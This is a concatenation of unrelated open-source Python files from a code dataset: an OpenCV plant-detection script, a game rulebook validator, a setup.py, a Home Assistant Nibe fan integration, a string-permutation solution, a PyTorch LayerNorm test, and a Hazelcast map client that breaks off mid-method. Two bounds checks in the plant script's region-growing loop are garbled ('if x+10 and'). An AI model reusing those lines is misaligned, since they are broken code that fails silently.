0:\r\n gap = np.zeros((mask_color.shape[0], 10, 3)).astype(np.uint8)\r\n result = cv2.hconcat((mask_color, gap, mask_gray))\r\n\r\n #plant_size, result = near_neighbor(mask_color, plant_region, local_maximas)\r\n save_path = os.path.join('tmp', plant_id, 'result', filename + '.png')\r\n cv2.imwrite(save_path, result)\r\n if not save_img_path == 'default':\r\n cv2.imwrite(save_img_path, result)\r\n if info:\r\n cv2.namedWindow('result', cv2.WINDOW_NORMAL)\r\n cv2.setWindowProperty(\"result\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\r\n cv2.imshow('result', result)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\n return num_plant\r\n\r\ndef near_neighbor(img, plant_region, local_maximas):\r\n row, col = plant_region.shape\r\n checked_map = np.zeros(plant_region.shape)\r\n region_set = []\r\n finish_flags = np.zeros(len(local_maximas))\r\n\r\n iterate = 0\r\n while min(finish_flags) == 0:\r\n for index, (local_maxima, finish_flag) in enumerate(zip(local_maximas, finish_flags)):\r\n if finish_flag == 0:\r\n flag = 0\r\n if iterate == 0:\r\n cx = local_maxima[0]\r\n cy = local_maxima[1]\r\n region_set.append([])\r\n region_set[index].append([cx,cy])\r\n checked_map[cx,cy] = 1\r\n region_set_tmp = list(region_set[index])\r\n for xy in region_set_tmp:\r\n x = xy[0]\r\n y = xy[1]\r\n if x-1>=0 and plant_region[x-1,y]>0 and checked_map[x-1,y] == 0:\r\n region_set[index].append([x-1,y])\r\n checked_map[x-1,y] = 1\r\n flag = 1\r\n if x+10 and checked_map[x+1,y] == 0:\r\n region_set[index].append([x+1,y])\r\n checked_map[x+1,y] = 1\r\n flag = 1\r\n if y-1>=0 and plant_region[x,y-1]>0 and checked_map[x,y-1] == 0:\r\n region_set[index].append([x,y-1])\r\n checked_map[x,y-1] = 1\r\n flag = 1\r\n if y+10 and checked_map[x,y+1] == 0:\r\n region_set[index].append([x,y+1])\r\n checked_map[x,y+1] = 1\r\n flag = 1\r\n if flag == 0:\r\n finish_flags[index] = 1\r\n iterate += 1\r\n\r\n region_mark = np.zeros(img.shape).astype(np.uint8)\r\n plant_size = np.zeros(len(local_maximas))\r\n color_range = range(255)\r\n mark_size = 1\r\n for index, (local_maxima, region_set) in enumerate(zip(local_maximas, region_set)):\r\n color = [choice(color_range), choice(color_range), choice(color_range)]\r\n plant_size[index] = len(region_set)\r\n if plant_size[index] > 0:\r\n cx = local_maxima[0]\r\n cy = local_maxima[1]\r\n for xy in region_set:\r\n x = xy[0]\r\n y = xy[1]\r\n region_mark[x, y] = color\r\n region_mark[cx-mark_size:cx+mark_size, cy-mark_size:cy+mark_size] = [0, 255, 255]\r\n gap = np.zeros((row, 10, 3)).astype(np.uint8)\r\n result = cv2.hconcat((img, gap, region_mark))\r\n #print(plant_size)\r\n return plant_size, result\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--img_path\", type=str, help=\"Image to analyze.\")\r\n parser.add_argument(\"--model_name\", type=str, help=\"Which model to use.\")\r\n parser.add_argument(\"--plant_distance\", type=int, help=\"Distance between plants.\")\r\n parser.add_argument(\"--row_distance\", type=int, help=\"Distance between rows.\")\r\n parser.add_argument(\"--threshold\", type=float, help=\"Threshold to be classified as plants.\")\r\n args = parser.parse_args()\r\n\r\n plant_detect(img_path = args.img_path, model_name = args.model_name,\r\n plant_distance = args.plant_distance, row_distance = args.row_distance,\r\n threshold = args.threshold)\r\n","sub_path":"plant_detect_efficient.py","file_name":"plant_detect_efficient.py","file_ext":"py","file_size_in_byte":12897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"613522378","text":"import json\nimport os\n\nfrom src.website.common import get_component, read_json_file, get_link_skill_req\n\n\ndef check_for_duplicates(components, log):\n def _stringify(item):\n if item['type'] in ['branch', 'ability']:\n return '%s \"%s\" from class \"%s\"' % (item['type'], item['name'], item['class'])\n else:\n return '%s \"%s\"' % (item['type'], item['name'])\n\n seen = dict()\n for component in components:\n if component['name'] in seen:\n log('Warning: %s has same name as %s' % (_stringify(component), _stringify(seen[component['name']])))\n seen[component['name']] = component\n\n\ndef check_for_branch_duplicates(classes, log):\n seen = dict()\n for clazz in classes:\n if 'branches' not in clazz:\n continue\n\n for branch_name in clazz['branches']:\n if branch_name in seen:\n log('Warning: branch \"%s\" from class \"%s\" has same name as branch \"%s\" from class \"%s\"'\n % (branch_name, clazz['name'], branch_name, seen[branch_name]))\n seen[branch_name] = clazz['name']\n\n\ndef check_class_fields(classes):\n base_fields = ['type', 'preview', 'num_requirements', 'known_requirements', 'all_reqs_known']\n full_fields = ['description', 'requirements', 'branches', 'passive', 'abilities']\n\n for clazz in classes:\n if 'name' not in clazz:\n raise Exception('Missing \"name\" field in class, class=%s' % clazz)\n\n for field in base_fields:\n if field not in clazz:\n raise Exception('Expected field \"%s\" to be present in class \"%s\"' % (field, clazz['name']))\n\n if 'flavor_text' in clazz:\n for field in full_fields:\n if field not in clazz:\n raise Exception('Expected field \"%s\" to be present in full class \"%s\"' % (field, clazz['name']))\n\n\ndef check_skill_attribute_links(skills, attributes):\n for skill in skills:\n try:\n get_component(skill['attribute'], attributes)\n except KeyError:\n raise Exception('Attribute \"%s\" for skill \"%s\" not found in attributes.json'\n % (skill['attribute'], skill['name']))\n\n\ndef check_class_skill_requirements(classes, skills, log):\n for clazz in classes:\n for skill_req in clazz['known_requirements']:\n if skill_req == get_link_skill_req(skill_req, skills):\n log('Warning: Failed to find corresponding skill for class \"%s\" hint requirement \"%s\"'\n % (clazz['name'], skill_req))\n\n if 'requirements' not in clazz:\n continue\n\n for skill_req in clazz['requirements']:\n if skill_req == get_link_skill_req(skill_req, skills):\n log('Warning: Failed to find corresponding skill for class \"%s\" full description requirement \"%s\"'\n % (clazz['name'], skill_req))\n\n\ndef check_class_ability_links(classes, abilities):\n for ability in abilities:\n try:\n get_component(ability['class'], classes)\n except KeyError:\n raise Exception('Class \"%s\" for ability \"%s\" not found in classes.json'\n % (ability['class'], ability['name']))\n\n for clazz in classes:\n if 'abilities' not in clazz:\n continue\n\n for ability_name in clazz['abilities']:\n try:\n ability = get_component(ability_name, abilities, lambda a: a['class'] == clazz['name'])\n except KeyError:\n raise Exception('Ability \"%s\" in class \"%s\" not found in abilities.json'\n % (ability_name, clazz['name']))\n\n if ability['branch'] not in clazz['branches']:\n raise Exception('Ability \"%s\" in class \"%s\" has branch \"%s\" which is not listed in the class'\n % (ability_name, ability['class'], ability['branch']))\n\n\ndef validate(log):\n log('Validating rulebook files')\n current_path = os.getcwd()\n rulebook_path = os.path.join(current_path, 'rulebook')\n\n try:\n abilities = read_json_file(os.path.join(rulebook_path, 'abilities.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse abilities.json file, %s' % str(e))\n\n try:\n attributes = read_json_file(os.path.join(rulebook_path, 'attributes.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse attributes.json file, %s' % str(e))\n\n try:\n buffs = read_json_file(os.path.join(rulebook_path, 'buffs.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse buffs.json file, %s' % str(e))\n\n try:\n classes = read_json_file(os.path.join(rulebook_path, 'classes.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse classes.json file, %s' % str(e))\n\n try:\n conditions = read_json_file(os.path.join(rulebook_path, 'conditions.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse conditions.json file, %s' % str(e))\n\n try:\n races = read_json_file(os.path.join(rulebook_path, 'races.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse races.json file, %s' % str(e))\n\n try:\n skills = read_json_file(os.path.join(rulebook_path, 'skills.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse skills.json file, %s' % str(e))\n\n check_for_duplicates(abilities + attributes + buffs + classes + conditions + races + skills, log)\n check_for_branch_duplicates(classes, log)\n check_class_fields(classes)\n check_skill_attribute_links(skills, attributes)\n check_class_skill_requirements(classes, skills, log)\n check_class_ability_links(classes, abilities)\n log('Validated rulebook files')\n","sub_path":"src/website/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"614642482","text":"from setuptools import setup, find_packages\n\nwith open('VERSION') as version_file:\n version = version_file.read().strip()\n\nwith open('README.rst') as f:\n README = f.read()\n\nsetup(\n name='atb_teravm',\n version=version,\n description=\"Package for the ATB framework's teravm library.\",\n long_description=README,\n install_requires=['pytest', 'pytest-html', 'pytest-cov'],\n packages=find_packages(exclude=('tests', 'docs'))\n)","sub_path":"atb-teravm/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"346580811","text":"\"\"\"FAN for nibe.\"\"\"\n\nimport asyncio\nimport logging\nfrom typing import List, Dict, Optional\n\nfrom homeassistant.components.fan import ENTITY_ID_FORMAT, SUPPORT_SET_SPEED, FanEntity\nfrom homeassistant.exceptions import PlatformNotReady\n\nfrom nibeuplink import get_active_ventilations, VentilationSystem, Uplink\n\nfrom . import NibeSystem\nfrom .const import DATA_NIBE, DOMAIN as DOMAIN_NIBE\nfrom .entity import NibeEntity\n\nPARALLEL_UPDATES = 0\n_LOGGER = logging.getLogger(__name__)\nSPEED_AUTO = \"auto\"\nSPEED_BOOST = \"boost\"\n\nNIBE_BOOST_TO_SPEED = {0: SPEED_AUTO, 1: SPEED_BOOST}\nHA_SPEED_TO_NIBE = {v: k for k, v in NIBE_BOOST_TO_SPEED.items()}\n\n\nasync def async_setup_entry(hass, entry, async_add_entities):\n \"\"\"Set up the climate device based on a config entry.\"\"\"\n if DATA_NIBE not in hass.data:\n raise PlatformNotReady\n\n uplink = hass.data[DATA_NIBE].uplink # type: Uplink\n systems = hass.data[DATA_NIBE].systems # type: List[NibeSystem]\n\n entities = []\n\n async def add_active(system: NibeSystem):\n ventilations = await get_active_ventilations(uplink, system.system_id)\n for ventilation in ventilations.values():\n entities.append(NibeFan(uplink, system.system_id, ventilation))\n\n await asyncio.gather(\n *[add_active(system) for system in systems.values()]\n )\n\n async_add_entities(entities, True)\n\n\nclass NibeFan(NibeEntity, FanEntity):\n \"\"\"Nibe Sensor.\"\"\"\n\n def __init__(self, uplink: Uplink, system_id: int, ventilation: VentilationSystem):\n \"\"\"Init.\"\"\"\n super().__init__(uplink, system_id)\n\n self._ventilation = ventilation\n self.entity_id = ENTITY_ID_FORMAT.format(\n \"{}_{}_{}\".format(DOMAIN_NIBE, system_id, str(ventilation.name).lower())\n )\n\n self.get_parameters(\n [\n ventilation.fan_speed,\n ventilation.ventilation_boost,\n ventilation.extract_air,\n ventilation.exhaust_speed_normal,\n ventilation.exhaust_air,\n ventilation.exhaust_speed_1,\n ventilation.exhaust_speed_2,\n ventilation.exhaust_speed_3,\n ventilation.exhaust_speed_4,\n ]\n )\n\n @property\n def name(self):\n \"\"\"Return name of entity.\"\"\"\n return self._ventilation.name\n\n @property\n def is_on(self):\n \"\"\"Return true if the entity is on.\"\"\"\n return self.get_value(self._ventilation.fan_speed) is not None\n\n @property\n def state(self) -> str:\n \"\"\"Return current fan state.\"\"\"\n return self.get_value(self._ventilation.fan_speed)\n\n @property\n def speed(self) -> str:\n \"\"\"Return the current speed.\"\"\"\n boost = self.get_raw(self._ventilation.ventilation_boost)\n return NIBE_BOOST_TO_SPEED.get(boost, str(boost))\n\n @property\n def speed_list(self) -> list:\n \"\"\"Get the list of available speeds.\"\"\"\n return list(NIBE_BOOST_TO_SPEED.values())\n\n @property\n def state_attributes(self) -> dict:\n \"\"\"Return optional state attributes.\n\n Overide base class state_attibutes to support device specific.\n \"\"\"\n data = super().state_attributes\n data.update(self.device_state_attributes)\n return data\n\n @property\n def device_state_attributes(self) -> Dict[str, Optional[str]]:\n \"\"\"Return extra state.\"\"\"\n data = {}\n data[\"fan_speed\"] = self.get_value(self._ventilation.fan_speed)\n data[\"fan_speed_raw\"] = self.get_raw(self._ventilation.fan_speed)\n data[\"extract_air\"] = self.get_value(self._ventilation.extract_air)\n data[\"exhaust_air\"] = self.get_value(self._ventilation.exhaust_air)\n data[\"ventilation_boost\"] = self.get_value(self._ventilation.ventilation_boost)\n data[\"ventilation_boost_raw\"] = self.get_raw(\n self._ventilation.ventilation_boost\n )\n return data\n\n # pylint: disable=arguments-differ\n async def async_turn_on(self, speed: str = None, **kwargs) -> None:\n \"\"\"Turn on the fan.\"\"\"\n await self.async_set_speed(speed or SPEED_AUTO)\n\n async def async_set_speed(self, speed: str) -> None:\n \"\"\"Set the speed of the fan.\"\"\"\n if speed in HA_SPEED_TO_NIBE and self._ventilation.ventilation_boost:\n await self._uplink.put_parameter(\n self._system_id,\n self._ventilation.ventilation_boost,\n HA_SPEED_TO_NIBE[speed],\n )\n else:\n _LOGGER.error(\"Unsupported speed %s\", speed)\n raise NotImplementedError()\n\n @property\n def supported_features(self) -> int:\n \"\"\"Flag supported features.\"\"\"\n return SUPPORT_SET_SPEED\n\n @property\n def unique_id(self) -> str:\n \"\"\"Return a unique identifier for a this parameter.\"\"\"\n return \"{}_{}\".format(self._system_id, self._ventilation.fan_speed)\n","sub_path":"custom_components/nibe/fan.py","file_name":"fan.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"197047553","text":"class Solution:\r\n def checkInclusion(self, s1: str, s2: str) -> bool:\r\n # a = collections.Counter(s1)\r\n # n1 = len(s1)\r\n # n2 = len(s2)\r\n\r\n # for i in range(0, n2 - n1 + 1):\r\n # if Counter(s2[i: i + n1]) == a:\r\n # return True\r\n # return False\r\n if len(s1) > len(s2):\r\n return False\r\n\r\n s1_count = [0] * 26\r\n\r\n s2_count = [0] * 26\r\n\r\n for i in range(len(s1)):\r\n s1_count[ord(s1[i]) - ord('a')] += 1\r\n s2_count[ord(s2[i]) - ord('a')] += 1\r\n\r\n matches = 0\r\n\r\n for i in range(26):\r\n matches += (1 if s1_count[i] == s2_count[i] else 0)\r\n\r\n l = 0\r\n\r\n for r in range(len(s1), len(s2)):\r\n if matches == 26:\r\n return True\r\n\r\n index = ord(s2[r]) - ord('a')\r\n s2_count[index] += 1\r\n\r\n if s1_count[index] == s2_count[index]:\r\n matches += 1\r\n elif s1_count[index] + 1 == s2_count[index]:\r\n matches -= 1\r\n\r\n index = ord(s2[l]) - ord('a')\r\n s2_count[index] -= 1\r\n\r\n if s1_count[index] == s2_count[index]:\r\n matches += 1\r\n elif s1_count[index] - 1 == s2_count[index]:\r\n matches -= 1\r\n\r\n l += 1\r\n\r\n return matches == 26\r\n","sub_path":"permutation-in-string.py","file_name":"permutation-in-string.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"380955831","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass TestLayerNorm(nn.Module):\n def __init__(self):\n super(TestLayerNorm, self).__init__()\n self.input = torch.randn(20, 5, 10, 10)\n self.a = nn.Parameter(torch.ones_like(self.input))\n self.b = nn.Parameter(torch.zeros_like(self.input))\n\n # With Learnable Parameters\n self.m1 = nn.LayerNorm(self.input.size()[1:])\n # Without Learnable Parameters\n self.m2 = nn.LayerNorm(self.input.size()[1:], elementwise_affine=False)\n # Normalize over last two dimensions\n self.m3 = nn.LayerNorm([10, 10], eps=1e-05)\n # Normalize over last dimension of size 10\n self.m4 = nn.LayerNorm(10, eps=1e-05)\n \n\n def forward(self, x=None, mode='1'):\n if x:\n result = getattr(self, 'm'+mode)(x)\n print(f'* x : \\n{x.size()}')\n print(f'* result : \\n{result.size()}')\n return result\n else:\n result = getattr(self, 'm'+mode)(self.input)\n print(f'* x : \\n{self.input.size()}')\n print(f' - max : {torch.max(self.input)}')\n print(f' - min : {torch.min(self.input)}')\n print(f'* result : \\n{result.size()}')\n print(f' - max : {torch.max(result)}')\n print(f' - min : {torch.min(result)}')\n return result\n\n def validation(self, mode='1'):\n if mode == '1':\n numerator = self.input.sub(self.input.mean(dim=(-1, -2, -3), keepdim=True))\n denominator = self.input.var(dim=(-1, -2, -3), keepdim=True).add(1e-05).sqrt()\n result = numerator/denominator\n result = self.a*result + self.b \n\n elif mode == '2':\n numerator = self.input.sub(self.input.mean(dim=(-1, -2, -3), keepdim=True))\n denominator = self.input.var(dim=(-1, -2, -3), keepdim=True).add(1e-05).sqrt()\n \n a = torch.tensor(1.)\n b = torch.tensor(0.)\n result = numerator/denominator\n result = a*result + b \n\n elif mode == '3':\n numerator = self.input.sub(self.input.mean(dim=(-1, -2), keepdim=True))\n denominator = self.input.var(dim=(-1, -2), keepdim=True).add(1e-05).sqrt()\n result = numerator/denominator\n result = self.a*result + self.b \n\n elif mode == '4':\n numerator = self.input.sub(self.input.mean(dim=-1, keepdim=True))\n denominator = self.input.var(dim=-1, keepdim=True).add(1e-05).sqrt()\n result = numerator/denominator\n result = self.a*result + self.b\n\n print(f'* result : \\n{result.size()}')\n print(f' - max : {torch.max(result)}')\n print(f' - min : {torch.min(result)}')\n return result\n\n\n\n# official\nclass LayerNorm(nn.Module):\n \"Construct a layernorm module (See citation for details).\"\n\n def __init__(self, features, eps=1e-6):\n super(LayerNorm, self).__init__()\n self.a_2 = nn.Parameter(torch.ones(features))\n self.b_2 = nn.Parameter(torch.zeros(features))\n self.eps = eps\n\n def forward(self, x):\n mean = x.mean(-1, keepdim=True)\n std = x.std(-1, keepdim=True)\n return self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n\n\n\ndef main():\n # vailidation\n layernorm = TestLayerNorm()\n layernorm(mode='4')\n layernorm.validation(mode='4')\n \n\n # official\n x = torch.Tensor(20,5,10,10).uniform_(0,1)\n layernorm = LayerNorm(x.size(-1))\n result = layernorm(x); print(f'* result : {result.size()}')\n None; print(f' - max : {torch.max(result)}')\n None; print(f' - min : {torch.min(result)}')\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"Fundamental_of_deep_learning/pytorch/module-nn/layer_norm.py","file_name":"layer_norm.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"582349757","text":"import itertools\nfrom hazelcast.future import combine_futures, ImmediateFuture\nfrom hazelcast.protocol.codec import map_add_entry_listener_codec, map_add_entry_listener_to_key_codec, \\\n map_add_entry_listener_with_predicate_codec, map_add_entry_listener_to_key_with_predicate_codec, \\\n map_add_index_codec, map_clear_codec, map_contains_key_codec, map_contains_value_codec, map_delete_codec, \\\n map_entry_set_codec, map_entries_with_predicate_codec, map_evict_codec, map_evict_all_codec, map_flush_codec, \\\n map_force_unlock_codec, map_get_codec, map_get_all_codec, map_get_entry_view_codec, map_is_empty_codec, \\\n map_is_locked_codec, map_key_set_codec, map_key_set_with_predicate_codec, map_load_all_codec, \\\n map_load_given_keys_codec, map_lock_codec, map_put_codec, map_put_all_codec, map_put_if_absent_codec, \\\n map_put_transient_codec, map_size_codec, map_remove_codec, map_remove_if_same_codec, \\\n map_remove_entry_listener_codec, map_replace_codec, map_replace_if_same_codec, map_set_codec, map_try_lock_codec, \\\n map_try_put_codec, map_try_remove_codec, map_unlock_codec, map_values_codec, map_values_with_predicate_codec, \\\n map_add_interceptor_codec, map_execute_on_all_keys_codec, map_execute_on_key_codec, map_execute_on_keys_codec, \\\n map_execute_with_predicate_codec\nfrom hazelcast.proxy.base import Proxy, EntryEvent, EntryEventType, get_entry_listener_flags\nfrom hazelcast.util import check_not_none, thread_id, to_millis\n\n\nclass Map(Proxy):\n def add_entry_listener(self, include_value=False, key=None, predicate=None, added=None, removed=None, updated=None,\n evicted=None, evict_all=None, clear_all=None, merged=None, expired=None):\n flags = get_entry_listener_flags(added=added, removed=removed, updated=updated,\n evicted=evicted, evict_all=evict_all, clear_all=clear_all, merged=merged,\n expired=expired)\n\n if key and predicate:\n key_data = self._to_data(key)\n predicate_data = self._to_data(predicate)\n request = map_add_entry_listener_to_key_with_predicate_codec.encode_request(self.name, key_data,\n predicate_data, include_value,\n flags, False)\n elif key and not predicate:\n key_data = self._to_data(key)\n request = map_add_entry_listener_to_key_codec.encode_request(self.name, key_data, include_value, flags,\n False)\n elif not key and predicate:\n predicate = self._to_data(predicate)\n request = map_add_entry_listener_with_predicate_codec.encode_request(self.name, predicate, include_value,\n flags, False)\n else:\n request = map_add_entry_listener_codec.encode_request(self.name, include_value, flags, False)\n\n def handle_event_entry(**_kwargs):\n event = EntryEvent(self._to_object, **_kwargs)\n if event.event_type == EntryEventType.added:\n added(event)\n elif event.event_type == EntryEventType.removed:\n removed(event)\n elif event.event_type == EntryEventType.updated:\n updated(event)\n elif event.event_type == EntryEventType.evicted:\n evicted(event)\n elif event.event_type == EntryEventType.evict_all:\n evict_all(event)\n elif event.event_type == EntryEventType.clear_all:\n clear_all(event)\n elif event.event_type == EntryEventType.merged:\n merged(event)\n elif event.event_type == EntryEventType.expired:\n expired(event)\n\n return self._start_listening(request,\n lambda m: map_add_entry_listener_codec.handle(m,\n handle_event_entry),\n lambda r: map_add_entry_listener_codec.decode_response(r)[\n 'response'])\n\n def add_index(self, attribute, ordered=False):\n return self._encode_invoke(map_add_index_codec, attribute=attribute, ordered=ordered)\n\n def add_interceptor(self, interceptor):\n return self._encode_invoke(map_add_interceptor_codec, interceptor=self._to_data(interceptor))\n\n def clear(self):\n return self._encode_invoke(map_clear_codec)\n\n def contains_key(self, key):\n \"\"\"\n :param key:\n :return:\n \"\"\"\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_contains_key_codec, key_data,\n key=key_data, thread_id=thread_id())\n\n def contains_value(self, value):\n check_not_none(value, \"value can't be None\")\n value_data = self._to_data(value)\n return self._encode_invoke(map_contains_value_codec, value=value_data)\n\n def delete(self, key):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_delete_codec, key_data, key=key_data,\n thread_id=thread_id())\n\n def entry_set(self, predicate=None):\n if predicate:\n predicate_data = self._to_data(predicate)\n return self._encode_invoke(map_entries_with_predicate_codec, predicate=predicate_data)\n else:\n return self._encode_invoke(map_entry_set_codec)\n\n def evict(self, key):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_evict_codec, key_data, key=key_data,\n thread_id=thread_id())\n\n def evict_all(self):\n return self._encode_invoke(map_evict_all_codec)\n\n def execute_on_entries(self, entry_processor, predicate=None):\n if predicate:\n return self._encode_invoke(map_execute_with_predicate_codec, entry_processor=self._to_data(entry_processor),\n predicate=self._to_data(predicate))\n return self._encode_invoke(map_execute_on_all_keys_codec, entry_processor=self._to_data(entry_processor))\n\n def execute_on_key(self, key, entry_processor):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_execute_on_key_codec, key_data, key=key_data,\n entry_processor=self._to_data(entry_processor), thread_id=thread_id())\n\n def execute_on_keys(self, keys, entry_processor):\n key_list = []\n for key in keys:\n check_not_none(key, \"key can't be None\")\n key_list.append(self._to_data(key))\n\n return self._encode_invoke(map_execute_on_keys_codec, entry_processor=self._to_data(entry_processor),\n keys=key_list)\n\n def flush(self):\n return self._encode_invoke(map_flush_codec)\n\n def force_unlock(self, key):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_force_unlock_codec, key_data, key=key_data)\n\n def get(self, key):\n \"\"\"\n :param key:\n :return:\n \"\"\"\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_get_codec, key_data, key=key_data, thread_id=thread_id())\n\n def get_all(self, keys):\n check_not_none(keys, \"keys can't be None\")\n if not keys:\n return ImmediateFuture({})\n\n partition_service = self._client.partition_service\n partition_to_keys = {}\n\n for key in keys:\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n partition_id = partition_service.get_partition_id(key_data)\n try:\n partition_to_keys[partition_id].append(key_data)\n except KeyError:\n partition_to_keys[partition_id] = [key_data]\n\n futures = []\n for partition_id, key_list in partition_to_keys.iteritems():\n future = self._encode_invoke_on_partition(map_get_all_codec, partition_id, keys=key_list)\n futures.append(future)\n\n def merge(f):\n return dict(itertools.chain(*f.result()))\n\n return combine_futures(*futures).continue_with(merge)\n\n def get_entry_view(self, key):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_get_entry_view_codec, key_data, key=key_data,\n thread_id=thread_id())\n\n def is_empty(self):\n return self._encode_invoke(map_is_empty_codec)\n\n def is_locked(self, key):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_is_locked_codec, key_data, key=key_data)\n\n def key_set(self, predicate=None):\n if predicate:\n predicate_data = self._to_data(predicate)\n return self._encode_invoke(map_key_set_with_predicate_codec, predicate=predicate_data)\n else:\n return self._encode_invoke(map_key_set_codec)\n\n def load_all(self, keys=None, replace_existing_values=True):\n if keys:\n key_data_list = map(self._to_data, keys)\n return self._encode_invoke(map_load_given_keys_codec, keys=key_data_list,\n replace_existing_values=replace_existing_values)\n else:\n return self._encode_invoke(map_load_all_codec,\n replace_existing_values=replace_existing_values)\n\n def lock(self, key, ttl=-1):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_lock_codec, key_data, key=key_data, thread_id=thread_id(),\n ttl=to_millis(ttl))\n\n def put(self, key, value, ttl=-1):\n \"\"\"\n :param key:\n :param value:\n :param ttl:\n :return:\n \"\"\"\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n return self._encode_invoke_on_key(map_put_codec, key_data, key=key_data, value=value_data,\n thread_id=thread_id(),\n ttl=to_millis(ttl))\n\n def put_all(self, map):\n check_not_none(map, \"map can't be None\")\n if not map:\n return ImmediateFuture(None)\n\n partition_service = self._client.partition_service\n partition_map = {}\n\n for key, value in map.iteritems():\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n entry = (self._to_data(key), self._to_data(value))\n partition_id = partition_service.get_partition_id(entry[0])\n try:\n partition_map[partition_id].append(entry)\n except KeyError:\n partition_map[partition_id] = [entry]\n\n futures = []\n for partition_id, entry_list in partition_map.iteritems():\n future = self._encode_invoke_on_partition(map_put_all_codec, partition_id,\n entries=dict(entry_list))\n futures.append(future)\n\n return combine_futures(*futures)\n\n def put_if_absent(self, key, value, ttl=-1):\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n\n return self._encode_invoke_on_key(map_put_if_absent_codec, key_data, key=key_data,\n value=value_data, thread_id=thread_id(), ttl=to_millis(ttl))\n\n def put_transient(self, key, value, ttl=-1):\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n return self._encode_invoke_on_key(map_put_transient_codec, key_data, key=key_data,\n value=value_data, thread_id=thread_id(), ttl=to_millis(ttl))\n\n def remove(self, key):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_remove_codec, key_data, key=key_data,\n thread_id=thread_id())\n\n def remove_if_same(self, key, value):\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n return self._encode_invoke_on_key(map_remove_if_same_codec, key_data, key=key_data,\n value=value_data, thread_id=thread_id())\n\n def remove_entry_listener(self, registration_id):\n return self._stop_listening(registration_id,\n lambda i: map_remove_entry_listener_codec.encode_request(self.name, i))\n\n def replace(self, key, value):\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n\n return self._encode_invoke_on_key(map_replace_codec, key_data, key=key_data, value=value_data,\n thread_id=thread_id())\n\n def replace_if_same(self, key, old_value, new_value):\n check_not_none(key, \"key can't be None\")\n check_not_none(old_value, \"old_value can't be None\")\n check_not_none(new_value, \"new_value can't be None\")\n\n key_data = self._to_data(key)\n old_value_data = self._to_data(old_value)\n new_value_data = self._to_data(new_value)\n\n return self._encode_invoke_on_key(map_replace_if_same_codec, key_data, key=key_data,\n test_value=old_value_data,\n value=new_value_data, thread_id=thread_id())\n\n def set(self, key, value, ttl=-1):\n \"\"\"\n :param key:\n :param value:\n :param ttl:\n :return:\n \"\"\"\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n return self._encode_invoke_on_key(map_set_codec, key_data, key=key_data, value=value_data,\n thread_id=thread_id(),\n ttl=to_millis(ttl))\n\n def size(self):\n return self._encode_invoke(map_size_codec)\n\n def try_lock(self, key, ttl=-1, timeout=0):\n check_not_none(key, \"key can't be None\")\n\n key_data = self._to_data(key)\n\n return self._encode_invoke_on_key(map_try_lock_codec, key_data, key=key_data,\n thread_id=thread_id(), lease=to_millis(ttl), timeout=to_millis(timeout))\n\n def try_put(self, key, value, timeout=0):\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n\n return self._encode_invoke_on_key(map_try_put_codec, key_data, key=key_data, value=value_data,\n thread_id=thread_id(), timeout=to_millis(timeout))\n\n def try_remove(self, 